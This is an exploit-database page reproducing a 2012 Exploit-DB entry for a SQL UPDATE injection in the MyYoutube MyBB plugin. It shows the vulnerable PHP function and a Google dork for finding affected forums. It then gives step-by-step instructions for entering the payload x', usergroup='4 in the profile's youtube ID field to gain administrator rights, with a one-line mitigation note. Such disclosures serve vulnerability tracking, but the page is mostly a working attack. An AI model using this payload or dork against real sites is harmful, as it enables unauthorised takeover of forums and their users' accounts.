header-logo
Suggest Exploit
vendor:
MyYoutube
by:
Zixem
7,5
CVSS
HIGH
SQL UPDATE injection
89
CWE
Product Name: MyYoutube
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2012

MyYoutube MyBB plugin SQL UPDATE injection.

MyYoutube plugin suffers from POST SQL UPDATE injection. The vulnerabillity exist within youtube.php, where the function youtube_update($ytb) is vulnerable to SQL injection. An attacker can exploit this vulnerability by entering malicious code in the youtube ID field in the usercp.php?action=profile page. This will allow the attacker to gain admin privileges.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.
# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"
# Date: 12.10.2012
# Exploit Author: Zixem
# Vendor Homepage: http://www.mybb-es.com
# Software Link: http://mods.mybb.com/view/myyoutube
# Version: 1.0
# Tested on: Linux.

MyYoutube plugin suffers from POST SQL UPDATE injection.

The vulnerabillity exist within youtube.php :
<?php

$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/ 

function youtube_update($ytb) /*Line 128*/
 {
 	global $mybb;
 	if(isset($mybb->input['ytb']))
	{
		$ytb->user_update_data['ytb'] = $mybb->input['ytb'];
	}
}

?>

Insturctions:
(1) Go to usercp.php?action=profile

(2) http://i.imgur.com/gPYdq.png
Enter this in the youtube ID field(just like in the picture): x', usergroup='4

(3) Press on the update button.

(4) You're an admin now :3


If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.

PoC: 
before: http://i.imgur.com/aPFsz.png
While exploiting: http://i.imgur.com/gPYdq.png
Result: http://i.imgur.com/4ezpF.png


http://twitter.com/z1xem

-Zixem

Navigation

Suggest Exploit

Services By CQR